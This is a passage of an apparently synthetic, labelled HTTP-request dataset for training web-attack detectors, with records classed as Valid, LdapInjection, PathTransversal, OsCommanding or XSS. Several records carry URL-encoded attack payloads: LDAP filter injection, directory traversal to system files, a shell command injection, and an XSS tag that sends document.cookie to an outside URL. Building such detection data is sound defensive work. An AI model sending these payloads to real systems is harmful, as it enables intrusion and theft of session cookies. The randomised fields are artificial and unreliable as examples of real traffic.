UA-Color: color32
UA-Pixels: 0437x4847
Via: 4.2 www.nbn4.jpeg
Transfer-Encoding: gzip
Upgrade: Nesagu/1.4
Warning: 818 99.108.31.199 "tnorsntcwrr7D9icy" "Mon, 11 Feb 08 22:58:34 CET"
X-Forwarded-For: 78.110.85.184
X-Serial-Number: 48619214669
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31750
Start - Id: 8057
class: Valid
GET /a9rPH1X-lN6/positionZTeN/deopsattqyo6cgm/_OFnull1httpsnEoreplace/r77LPAZ-Qk/dsde/h2rtBhtenolr/ai4/r5L4G5Hpoj/aeaa/atlj5o.gif?enwfhejn=2799&reEX37HSN=59bArsyiiEtoexest&ea3lye=bFU%40WPU&qhttpSjFK=re%3Bet&NsplbrEyamnc=4&m8Aaeusdkipet=3scl8shhom97ost&dmoOtIt=rah&hucugegp0fxas6m=roNrb%7Eu&Jwinnt3z=lLPb1tZo&c9netimsesesCo=+&Trurr8apriIr1ao=s90SeJpevaluyi1&DN2Ahm@=102573&cfmjoTc8msa=574&0eeod=28858 HTTP/1.1
Host: www.rpSes.be
Connection: keep-alive
Accept: text/plain;q=0.4, video/quicktime
Accept-Charset: iso-8859-15;q=0.2, shift_jis;q=0.1, x-mac-icelandic, windows-1258;q=0.6, x-mac-chinesetrad;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.3
Cache-Control: min-fresh=93
Cookie: srhnsuq5r=344504
Date: Wed, 13 Apr 05 09:23:26 GMT
Expect: tgetdwS
If-Unmodified-Since: Sat, 08 Oct 05 02:25:41 GMT
If-Match: *
If-Range: Fri, 14 Jul 06 11:10:20 CET
Max-Forwards: 5
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: YsN39r adouz=1z3nk
Authorization: Digest realm
Range: -7887,3458-,5341-
Referer: http://www.4sdq.org/Etw7/nshnedt1.cfm
Trailer: Transfer-Encoding
User-Agent: zoat1Rt (ewmKlPrkGn; tZYAZeR-b; nW_gr2Iq6c; 3_gWR-)
Via: otcst/4.0 www.igmS.jpeg, HTTP/5.5 167.78.150.172, 5.6 www.hsnh.css
Transfer-Encoding: identity
Warning: 863 162.184.82.83 "ktah" "Tue, 29 Mar 05 04:42:21 GMT"
X-Forwarded-For: 247.192.186.78
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8057
Start - Id: 37996
class: LdapInjection
GET /apadios1tornTd/jZUzw0PIl-X.j3era0/tbBDZJ.php3?a9.LXrQdEX=eKbB7&v8Q4rNFrmjG-s=cz%29%28%26%28objectClass%3D+++hmc*%29&1ccaHd=5415&iA=ta2h%2B&tdendlc=1330561&Oteseh=2&emgtrs5=7971&ifQTg5X8.L=30&tpsa=w&etoCd0Pmssou2=hB4EZt&n2rhsrlfattltSi=%3Fijy&tpmpunauaeetzg=geerpgIs6&rusuyter7etkgl=t2HOAY_-vZ3V&0SirlMdmaun93=688 HTTP/1.0
Host: www.HyAZne3.net:80
Connection: keep-alive
Accept: video/mpeg;q=0.6, application/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 115.116.216.130
Cookie: 8uorvoda08toasj=i
Cookie2: $Version="53"
Date: Wed, 19 Sep 07 09:26:41 UTC
ETag: W/"dKKZ-cddyT5zsZX1yuM"
Expect: 100-continue
From: mitestt@bt3ed.cz
If-Modified-Since: Wed, 11 Aug 04 15:04:12 UTC
If-Unmodified-Since: Thu, 05 Jul 07 17:59:47 CET
If-Match: "8aKcEsg1XHUUpGgd"
If-None-Match: *
If-Range: *
Max-Forwards: 993
MIME-Version: 4.1
Pragma: 5='4o8trk5m'
Proxy-Authorization: Digest opaque="tnharvec"
Authorization: Digest response="dAd5FcB57E0C5AB9ea90BC841f0938cc"
Range: -90
Referer: /se0sYiu/inhc/eGqb6.mpeg
TE: chunked,trailers,trailers
Trailer: TE
User-Agent: yi0kOrsAw
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 880x8476
Via: 0.7 www.ctong.html, HTTP/8.0 www.n6sniitf.jpg, ryesU/9.9 47.0.215.6
Transfer-Encoding: compress
Upgrade: 6isty/2.9, aeiotr/0.1
Warning: 489 www.2ueh.shtml "ll6uon" "Mon, 01 Aug 05 13:30:03 CET"
X-Forwarded-For: 69.225.134.146
X-Serial-Number: 800649
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37996
Start - Id: 3843
class: Valid
GET /Sf0pJ0UfD@/tVD/pexecEDLvsfr/tsipynngeeab/QvIITvIo-allz/wotW996425uz1-kQP1Q/e1YheSA/oaq@/dRX0eY00ZuO@OOOYhYU/Xnhn0rodti/nospYsortt2TN0fezh/sut9J_4@BV.nsf?tIyAag=mrrt&eSAyecjh=+tmt9esei&stkhanrsD0=N%28ntrt%28&nT6Cweouedt=dzvW&ha6ilenbP1eutP=9mQS6S_J&t3diino2R=rS3hoPIh&tok8ea=540&mPoXs4fQG2o2=Iiam&ae9sa0=1bodhrthaxliwsc&@@X-B=677351458&Lnph-QKf-toDrWT=yettt9re%3EIcz&8ksaIr=641661 HTTP/1.1
Host: www.ihafzeee.com
Connection: ogmOe
Accept: */*
Accept-Charset: iso-8859-15;q=0.0, windows-874;q=0.6
Accept-Encoding: identity
Accept-Language: *;q=0.5
Cache-Control: max-age=4670
Client-ip: 192.184.71.53
Cookie: ntx6ptnmeacec23=n1vKXGT;orhacOswn=81;vm3uapni=cl
Cookie2: $Version="105"
Date: Mon, 19 Jan 04 10:15:23 CET
ETag: W/"W0g2v.12XsVr_5fExCA"
Expect: rsfii=tdeerm
From: N8otdyin@xnevet.de
If-Modified-Since: Fri, 27 Jan 06 09:47:47 UTC
If-Unmodified-Since: Thu, 04 Sep 08 08:56:54 GMT
If-Match: *
If-None-Match: "KNABPRNr0vsjo9QYH@"
If-Range: Sun, 08 Feb 04 09:17:51 UTC
Max-Forwards: 528
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: zoctyi 7aisneR=e096hns
Authorization: NTLM dGVlSmlpckR3NG9zbnNUaWFlYWFpOXdudG5vN25tbHJtaGxPSTlpRmU=
Range: -486,5599-,8-3090
Referer: http://www.ieton.org/gxt4Q.wmn
TE: chunked,trailers,trailers
User-Agent: fleesoptEj3thdOu
UA-CPU: 68000
UA-Disp: 9985,6519,16
UA-Color: color32
Via: 0.8 www.eT9a.gif:785
Transfer-Encoding: gzip
Upgrade: eeyd/1.5, nTs9te/2.1, tdqnc/6.5
Warning: 584 www.iahsed.jpg "oi5d" "Wed, 25 Jul 07 08:26:14 GMT"
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3843
Start - Id: 45596
class: PathTransversal
GET /ntjlybafIEcrdo/ta5D/imoEeh/eO./am/uAgArQtCu7P@kO/muq8cevzP_mcr-WrsD/1aurlf7k7njy/bTHgadmin/qnr.mdb?shE54behomarsie=365851222&tav5tk=ot6FRHt&6dhahs=tME40&igCnEpanhn7xilh=gNISh70GZXc&UhonNieilssns=eeautoexec5jd&4tLrer=9081271&tcbnnrise=oOs&mfs0aa99wcpihi=aed0a%5Dt%27Rsg&ahetitgxsnrpr=%5Cautoexec.bat&MRorIL=6 HTTP/1.1
Host: www.fei1muo6o.be
Connection: rdevc
Accept: text/*;q=0.2, text/xml
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: pahIzDa=e6i98
Client-ip: 44.208.226.169
Cookie: oolx=ttorMxml ;aessbisoh4n=k
Cookie2: $Version="7"
Date: Fri, 19 Nov 04 09:23:08 GMT
ETag: "eCEkqix4L1LuKK.C8YF"
Expect: 100-continue
From: f4re3ea2@HiNl.uk
If-Modified-Since: Thu, 06 Sep 07 10:19:29 UTC
If-Unmodified-Since: Thu, 21 Jan 10 01:55:57 CET
If-Match: *
If-None-Match: "MzcsACYnhVi0VBe"
If-Range: *
Max-Forwards: 5
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: ench vu6n=5eeTe
Authorization: Digest opaque="6glonc"
Range: -709
Referer: http://cTQct.fr/6tio1on.tiff
TE: gzip;q=0.7,gzip,trailers
Trailer: Accept
User-Agent: eBee (aTUM7R; zieB@PCJWw; r30_G4.; n2TubBCSeM; ciDm5etIkc)
UA-CPU: 68000
UA-Disp: 6050,986,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5892x3688
Via: frtav/9.5 www.gmlTv.css, FTP/4.2 243.202.97.221:0663
Transfer-Encoding: lY3H8; ophnihd=eotc
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 283 170.214.194.99 "oochsm" "Thu, 12 Feb 09 16:17:19 CET"
X-Forwarded-For: 204.138.194.99
X-Serial-Number: 90033234881
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45596
Start - Id: 25831
class: Valid
GET /ac0sitx.html? HTTP/1.0
Host: www.9Taolnrwin.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, gzip, deflate
Accept-Language: g2e-PSoxec;q=0.8, sitcgse9-anoteei;q=0.3, hCemRhox-tiOs;q=0.2, i-s
Cache-Control: only-if-cached
Client-ip: 193.228.192.91
Cookie: ot0kden4n=214;tp=aD;te=a;titcehtcb=gepatua1
Cookie2: $Version="869"
Date: Thu, 20 Nov 08 24:34:02 CET
ETag: W/"@c1u_iQtSdTkmyi_Cg"
Expect: iiedtmT=gotYo;petx
From: ehrr@sqgr.com
If-Modified-Since: Thu, 15 May 08 18:11:59 UTC
If-Unmodified-Since: Sun, 21 Feb 10 20:35:38 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 05 Oct 07 13:41:18 CET
Max-Forwards: 622
MIME-Version: 8.4
Pragma: lRIjaht=hiirker
Proxy-Authorization: lpm4t aNaOhes=tssi
Authorization: Digest nonce
Range: 99966-9031,68556-8,-5435
Referer: http://www.rus1wu.it/2gsnt/erys.wav
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/3.1 (Machintosh; U; Mac OS X 5.5; ia-o5; rv:6.7.5) Gecko/33587318
UA-CPU: StrongARM
UA-Disp: 3806,956,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 520x0273
Via: 5.3 www.oJeae.png:9
Transfer-Encoding: gzip
Upgrade: trtt/3.8
Warning: 355 156.42.115.95 "hsme8p8cs85ter4zse9" 
X-Forwarded-For: 99.126.193.7
X-Serial-Number: 5771791492061
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25831
Start - Id: 33725
class: Valid
POST /dm9E.gif? HTTP/1.0
Content-Length: 185
Content-Language: 2l
Content-Encoding: compress
Content-Location: /4usfud/tEio/gRIrs.php3
Content-MD5: dzNyZW5zcDFxbTVpNmhsOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Nov 09 10:26:48 GMT
Last-Modified: Tue, 13 Sep 05 11:06:37 CET
Host: 109.178.162.207:80
Connection: close
Accept: */*
Accept-Charset: hz-gb-2312;q=0.6, euc-tw;q=0.2, x-mac-hebrew, cp-936, x-mac-korean;q=0.9
Accept-Encoding: deflate
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 3.48.203.172
Cookie: rmnaenoln1srl=3126306;ol893n9oi=i200A;mebweieotneoe=sCQHmr;et=tdAG
Cookie2: $Version="09"
Date: Fri, 27 May 05 13:12:00 UTC
ETag: "Nyk.tdd8xGa5-nMk"
Expect: 100-continue
From: eSwnhmt9@baaeh4uleA.net
If-Modified-Since: Thu, 28 Sep 06 18:21:35 GMT
If-Unmodified-Since: Thu, 05 Feb 04 16:44:04 UTC
If-Match: "3NCNo2D1lj0Q1t3E"
If-None-Match: "C_@qZI7zF0GhuFU3n"
If-Range: *
Max-Forwards: 27
MIME-Version: 5.8
Pragma: e8oo1=lnqner
Proxy-Authorization: Digest nc=5fd1B4Da
Authorization: Digest algorithm=45Cpi3ns
Range: 666-,61-39
Referer: http://6tchsafa.net/Isu9/uNor.zip
TE: chunked
Trailer: Max-Forwards
User-Agent: Mozilla/2.4 (Machintosh; U; PPC 3.9; wc-sm; rv:1.7.9) Gecko/44295163
UA-CPU: StrongARM
UA-Disp: 9133,083,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 520x205
Via: 8.1 4.34.233.82, 6.1 245.224.38.40:85, FTP/1.0 226.26.118.28:804
Transfer-Encoding: identity
Upgrade: 9pr88s/0.3, oxtem/8.9, l6ss/8.5
Warning: 146 www.heyaohc7.png "iqTeaiaieCen" "Thu, 28 May 09 11:14:53 UTC"
X-Forwarded-For: 145.242.152.101
X-Serial-Number: 695598853636
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

igzsjdnsxanSuai=83148&isit=02&omcrnke= nhb;p 9fkxu&asved7wslv=1&vs6=tfurOnw26sfth&cnttsnfihPtl=0&bqnnery=fromqdstdin&feb= ect%f|-7&begerho=86&Rt=a&drei9difeHn=eKH-fOCxAb&hij0o=tsl

End - Id: 33725
Start - Id: 36753
class: OsCommanding
GET /g4n9ashe/VgY0nt4nTOacl./cjHYvkfDLsopJ_hTJIi/null7Sq9/cec8net/rUJra2fm@fR_/ttheeng/Otontrehz8efngrtwQ3t.htm?iNosndQtenE=3982&e9=mail+++98y%40tpetlt6.noecz.gov++%3C%3C+++%2Ftmp%2Fwu.c%3B&3b=%3Axi%2F&_LhnVgvQ=sqX&hoUegoh=tee&tanT9teear9pt=ws HTTP/1.1
Host: 63.37.183.157:09311
Connection: Ah1az2
Accept: */*;q=0.7
Accept-Charset: macintosh;q=0.8, cp-932;q=0.8, koi8-r;q=0.4
Accept-Encoding: gzip, identity;q=0.9
Accept-Language: 4-ha0ga, uonne-1oesoRa
Cache-Control: max-age=6920
Client-ip: 66.186.73.243
Cookie: e6e4WGErnre=heG7efdCnkEobhsp;rogl1Sueoeo=33123701
Cookie2: $Version="786"
Date: Mon, 03 May 10 23:59:41 GMT
ETag: W/"f0JXW1xbhB1kOfJBE"
Expect: aemtte
From: 1Ruwies@Rllsdtnt.st
If-Modified-Since: Wed, 19 May 04 04:29:15 UTC
If-Unmodified-Since: Thu, 06 Mar 08 02:57:21 CET
If-Match: "AcodqUqxsT1b9Y33"
If-None-Match: "whlAbR@ZXAo_LZWA79"
If-Range: Fri, 28 Sep 07 18:38:37 CET
Max-Forwards: 9261
MIME-Version: 5.1
Pragma: Oeuew='icodwh'
Proxy-Authorization: Digest response="49a2dbb09A077a8FDd2baA76dAA5E5dd"
Authorization: Digest uri=/s4bleeni/AsitIdO/atwNr/cn7ee.doc
Range: 50-7
Referer: http://lsrgeiih.it/osht5/alfu/hasC/qxiF7.tiff
TE: chunked
Trailer: From
User-Agent: Mozilla/2.4 (Windows; U; Win98 8.3; an-rw; rv:7.1.0) Gecko/64513991
UA-CPU: x86
UA-Disp: 944,674,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 232x1783
Via: 5.9 www.bxici.css, FTP/6.7 201.125.173.100, inkn/3.9 234.106.150.30
Transfer-Encoding: deflate
Upgrade: irb6d/8.9, te8/0.6
Warning: 508 www.fetrah.tiff "t7sycuhIpesS" "Wed, 10 Feb 10 05:46:21 GMT"
X-Forwarded-For: 128.194.144.121
X-Serial-Number: 51873709956197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36753
Start - Id: 36060
class: PathTransversal
GET /euSna/m4vseieapNOn/OmM-RBLK7uQyn/fe/uKe.bgsound0_PnullVs7B88/fiiframe/or/35E4BVHwI5.jpg?eaahtsiv=4901&iueee=%286&rgWeheitt=itb2niinrejahfien&achsleaEkd=buraccept%3Bf&oaqiipclEs=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Ftatata%2Fesns%2Fat%2Filatverite.swf&meeO=1iH9db_6%407h&edeadaehl6olf=3&m4ltuyerootocS=nR0SOQbMXz2_&ecrnse=u9.O%407v&s9ratiaiybed=odsysteme%3BTC%5Dy%3A%3B+ayo6evals&4cnfi=ezlkYxMDjVv&steohnirxq5a=Ta-EphgRapthaa%5Dssu&uTea0kae=1853020&sem=ozdaAwebem10c&pn=7 HTTP/1.1
Host: 236.171.245.86
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987, koi8-r
Accept-Encoding: compress, identity;q=0.3
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 67.249.93.38
Cookie: cjgse=9hUXufyADw;8Re57=tIpeetjtstnh;oeeoo=to s
Cookie2: $Version="63"
Date: Mon, 05 Mar 07 02:05:37 CET
ETag: W/"8CezCdd-SQ6sdgh"
Expect: eeafeono
From: 17ii@oeayeoc.biz
If-Modified-Since: Fri, 25 Feb 05 23:34:02 CET
If-Unmodified-Since: Tue, 05 Dec 06 02:52:07 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 22 May 08 06:22:08 UTC
Max-Forwards: 8
MIME-Version: 5.0
Pragma: De=5idT
Proxy-Authorization: Basic YndzbHRvOmVuRWZodHM=
Authorization: sesr dyand1=Ihe1t
Range: -31,-3,49859-
Referer: http://vtuid.be/orpitti/gyhbes.jpg
TE: deflate
Trailer: Warning
User-Agent: iresy (hk__lu; uSGtV-; hHHQ@w; syxLF5Sd6)
UA-CPU: x86
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: FTP/6.8 103.130.154.78, 6.0 www.xan3n.gif, 3.1 www.1moleexq.css:441
Transfer-Encoding: gzip
Upgrade: ndmi/3.1, iziw/1.4
Warning: 312 152.156.79.110 "mvw6naexs" "Mon, 19 Sep 05 14:03:29 GMT"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36060
Start - Id: 17547
class: Valid
GET /48Z9WLkK9iIaPIuT/rAFd.php?saana9o3lu=6 HTTP/1.1
Host: 97.115.63.23
Connection: hteta
Accept: image/*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: up-Iaemcty, N1sdi-n;q=0.6, qao-d, r0m0uAda-enm;q=0.6, ss8s-htys
Cache-Control: trytasvh=Dgee9
Client-ip: 130.134.24.111
Cookie: otmNoareaah=12;bgAformK=6;F6ekihlrnjmaeoh=671346;iu1i=(;mcnhNnaaass8=292
Cookie2: $Version="2"
Date: Mon, 08 Mar 10 14:25:03 GMT
ETag: W/"iFo9CpJUkkgfba_O"
Expect: 100-continue
From: noim@o36slone.be
If-Modified-Since: Mon, 04 Jul 05 09:43:27 GMT
If-Unmodified-Since: Mon, 08 Nov 04 11:21:48 UTC
If-Match: *
If-None-Match: "_NfWMiAbZ0@arnrvEW0"
If-Range: Thu, 04 Sep 08 06:59:51 CET
Max-Forwards: 7
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Digest uri=/hlsmf/elihchu/rrenbd.png
Authorization: Basic ZWVodzpBOHRtbm5s
Range: -848823,71971-191917
Referer: http://fptslpnn.it/hdlsl5/efhir2e/aR1neUi/obzBb.dll
TE: chunked;q=0.2,trailers
Trailer: Authorization
User-Agent: Mozilla/8.6 (Windows; U; Win 9x 5.2; Hd-5b; rv:4.5.2) Gecko/74363457
UA-CPU: StrongARM
UA-Disp: 033,9220,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 845x6872
Via: FTP/0.5 176.163.69.98:52, HTTP/0.0 www.rnEs.jpeg, HTTP/3.9 51.96.224.245
Transfer-Encoding: identity
Upgrade: qnef/6.1, teHndi/9.7, n5GAtw/8.0, Epe/2.3
Warning: 578 www.cuZgchp.tiff "esuto1wenhlasinfem" "Mon, 23 Mar 09 10:21:32 UTC"
X-Forwarded-For: 235.147.93.170
X-Serial-Number: 8998788877117234588
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17547
Start - Id: 21083
class: Valid
GET /6Tk3X29lP/L8.jpeg?axnnklrns1y=nrf7&etHasrl1dsne=durcit&69rsg98rn3Jbkit=b&tietjoe6ded=s%26edty%7Ew5rb&eFothsHcahe0d=a50dpmi%3Eisbsssam HTTP/1.0
Host: www.ohle.uk
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.2, compress, identity, deflate
Accept-Language: tiThcl-q4;q=0.0, oienbuSl-mosfa;q=0.8
Cache-Control: max-stale
Client-ip: 32.242.224.45
Cookie: ipbnb=9850865
Cookie2: $Version="968"
Date: Sat, 08 Jan 05 19:44:56 CET
ETag: W/"6vR35mcl.mWQF5M4Y-i"
Expect: tNlt=exeet
From: TcuGd@oto9w.com
If-Modified-Since: Thu, 25 Jan 07 22:33:32 UTC
If-Unmodified-Since: Sat, 24 Jun 06 05:15:33 GMT
If-Match: *
If-None-Match: "Ws7LIrGL-_gYlPA"
If-Range: Tue, 15 Aug 06 19:10:57 UTC
Max-Forwards: 93
MIME-Version: 9.2
Pragma: tweync7e=6m
Proxy-Authorization: Basic VHp5czpjNE50bGF3ZA==
Authorization: Basic dGFtc2U6U2NzZmY=
Range: 966923-49277,-9,672714-
Referer: http://intksfdx.be/q7nb/zisaig1.asp
TE: trailers
Trailer: TE
User-Agent: dsvsmel
UA-CPU: 68000
UA-Disp: 708,2630,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 523x776
Via: 8.4 237.243.201.153, fktaWy/9.0 www.augueds.jpeg
Transfer-Encoding: deflate
Upgrade: 7ynff/7.0
Warning: 189 www.hycml3zs.png "rldecgpldeu7l" 
X-Forwarded-For: 133.50.37.166
X-Serial-Number: 375530664718592378
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 21083
Start - Id: 47753
class: XSS
GET /ibqHejOuKw.6-/ssrssrtdiavl5pg/ss/eY0V.htm?eA=%3Cobject+classid+++%3D+%22++++clsid%3A...+%22++codebase++++%3D+++%22++++javascript%3A++++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.ge.com%2Fcgi-bin%2Fseveat.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22++++%3E&DhiT@OLRcmd=wgrat9IltnF&uEettlaecn=1655&iaFmmzOgsw=ijBNB&dYltat=29170 HTTP/1.1
Host: 107.125.100.74
Connection: w0aAt
Accept: */*;q=0.4
Accept-Charset: iso-10646-ucs-2;q=0.9, big5, iso-8859-8-i, x-mac-cyrillic;q=0.5
Accept-Encoding: 
Accept-Language: io-meloizws, 3r-rq9;q=0.1, yc9x2l-oSfoew3l, f-rj, ngr-YnN6a4;q=0.2
Cache-Control: no-cache
Client-ip: 244.205.136.111
Cookie: eceyee=9079492328;os6=nNC._9Cu1hZG;l3ysafmbX=rnpcoraus
Cookie2: $Version="00"
Date: Fri, 14 Dec 07 24:38:36 GMT
ETag: W/"sPg8XQuBd1fbCE95qfIX"
Expect: 100-continue
From: timd@onRl.biz
If-Modified-Since: Tue, 29 Jun 04 16:36:17 UTC
If-Unmodified-Since: Fri, 16 Dec 05 05:05:06 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 638
MIME-Version: 7.7
Pragma: be='oyoey'
Proxy-Authorization: Basic b3Q3YXlzZm06ZHZjaG5m
Authorization: Basic Nkl5OTpQYm5zYXZi
Range: -887125,6715-3229
Referer: http://dtsh1e.de/asrd1/tedktej/noshs3ar/rnia/7jtfe.mdb
TE: gzip
Trailer: Date
User-Agent: Mozilla/6.4 (Machintosh; U; Mac OS X 7.3; ie-da; rv:0.4.4) Gecko/31771489
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 561x6609
Via: wlfe/1.9 www.cqtJnru.js, 8.7 74.54.253.242, 4.0 95.121.132.173
Transfer-Encoding: oett
Upgrade: sji/4.0, asq/5.9, arzh/5.3
Warning: 123 216.249.112.222 "zvuintlrwsyt" 
X-Forwarded-For: 198.120.124.208
X-Serial-Number: 75850540029155
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47753
Start - Id: 23711
class: Valid
GET /eu6rtmth4csnaioe.php4?e80citttnT4ic=902837601&pMM6G1jO=o6MlFu_U&eoiepbi=4464521006&tlgaavhj=9&Tdssnw=44757966&ta=58376 HTTP/1.1
Host: www.aiuHu.com
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: compress;q=0.6, deflate;q=0.4, deflate;q=0.3, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 26.208.93.197
Cookie: F31ysOC0=d@4wMPR;pkftfjGna8dh7sa=pn>ntd
Cookie2: $Version="51"
Date: Tue, 16 Mar 04 13:07:09 UTC
ETag: W/"VgZhKD9NhHdEZ3Nql8O"
Expect: 100-continue
From: rteef@dehrxns.com
If-Modified-Since: Sat, 14 Jul 07 05:21:12 CET
If-Unmodified-Since: Thu, 17 Mar 05 20:21:04 UTC
If-Match: "MPHlK5@rDQVYawK_"
If-None-Match: "IdK4oMu50W6fCKgirU"
If-Range: Mon, 03 Dec 07 08:17:34 UTC
Max-Forwards: 0
MIME-Version: 3.3
Pragma: d='ronoEe'
Proxy-Authorization: NTLM YTJ2Y2Vtc29wdGF1bWZlaWRtaGUxZmVvc2RvdHdnYUFpcg==
Authorization: ao9t eeelTTme=35on
Range: 8-90,05-70
Referer: http://www.VicgrSzl.net/gi3oognm/eqsaddbs/reT65rex/h8SeceeS.bin
TE: trailers
Trailer: Accept-Language
User-Agent: Apr3nsa/8.7.7.3.8
UA-CPU: PowerPC
UA-Disp: 188,809,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 431x276
Via: FTP/1.6 51.120.201.54, HTTP/8.7 www.4eMgI.htm:2
Transfer-Encoding: eihw7
Upgrade: eaoo3/2.4
Warning: 169 20.110.71.138:174 "Xuulgeai2thhnsm" "Tue, 19 May 09 22:55:23 CET"
X-Forwarded-For: 20.78.164.130
X-Serial-Number: 13224
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23711
Start - Id: 15598
class: Valid
GET /entti0rsutAcfiisvOS/eX/intjaewmeo9o/tt7eu.nsf? HTTP/1.1
Host: 189.41.80.73
Connection: close
Accept: application/zip, audio/x-wav;q=0.8, audio/x-wav
Accept-Charset: x-mac-icelandic;q=0.6
Accept-Encoding: deflate, identity;q=0.9, identity;q=0.6, identity, compress;q=0.3
Accept-Language: iht-ixa, sgug4n-ee;q=0.9, fqg-nTwlctoe;q=0.4, in-focg;q=0.6
Cache-Control: no-cache
Client-ip: 245.168.36.26
Cookie: inwH7efr=jeo%E
Cookie2: $Version="758"
Date: Sat, 01 Sep 07 14:38:53 CET
ETag: "uzTbHrxBKaB9jfPP2FZ"
Expect: 100-continue
From: egyhr8@dp3Tsste.uk
If-Modified-Since: Tue, 26 Jan 10 23:38:24 UTC
If-Unmodified-Since: Wed, 07 Apr 10 01:05:08 UTC
If-Match: "70gM6YAS-1UouhVb-@m"
If-None-Match: *
If-Range: Thu, 25 May 06 10:05:28 CET
Max-Forwards: 74
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: vrynOe rp7b=4e4ltho
Authorization: psltiV egca8zen=tdad
Range: 713-,63505-263305,-5
Referer: http://www.riz35nC.cz/04noo/mrhwrro7/ynocu/edhu.js
TE: gzip;q=0.4,trailers,gzip;q=0.0
Trailer: If-None-Match
User-Agent: Mozilla/8.7 (X11; U; Linux i386 7.2; ed-sL; rv:7.2.1) Gecko/15698571
UA-CPU: StrongARM
UA-Disp: 6997,2837,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 817x4367
Via: 0.3 78.198.138.117, FTP/9.1 www.6shcn.jpg
Transfer-Encoding: tb3m
Upgrade: aeaae/1.2, oeh0/9.9, asctrd/8.3
Warning: 737 123.135.15.139 "27acrahrs" 
X-Forwarded-For: 73.158.140.128
X-Serial-Number: 42056284732310990
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15598
Start - Id: 32092
class: Valid
GET /de2rertaemeasn/rdheuetrEl/n6rCntaepns1t/wPITlES@emet8mU/tecoice9/SdocumentOt_wz/oVIuMfRb1TRUdLkmO.png?ewj=wp-&7nnoXa5lnot=eomwudfeoqy4rhL&vddNeE6ncex=65379344&gobn=1dfelt&-UVhytP8N=1676842462&deemxnmutjesaa8=p7hn&iaswweNz=7502287714&rrnatnnomoFea=19774&mteeqte9l=za5wwor&hefaa24rt=0&rt=eekeo+hb7%27e0dh%7Eol7i&eyosigifwnWd=kwd&itr0ralatEsg=rBHxu&Ew82YJZMT8D-=bmiSeeA&Iu=195626 HTTP/1.1
Host: www.ckvsfgaae.cz:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257, utf-7, x-mac-arabic;q=0.8, iso-8859-8, iso-8859-5;q=0.0
Accept-Encoding: compress, deflate;q=0.9
Accept-Language: aeqkt-9ea4;q=0.2, 9a1e8-4;q=0.3, ae-Berf;q=0.8, 2h-oroXn8;q=0.0
Cache-Control: max-age=2
Client-ip: 238.80.111.117
Cookie: ursjhr=218;ohw5fi6ge=7@2iw;EdeleteiiHE=5etusru;osMhchhabiepsii=604961;@documentgroup bycopyQA=c8e;1ou8gAsehasmflS=liR1ETmtgN-D
Cookie2: $Version="24"
Date: Wed, 21 Jan 04 10:34:02 UTC
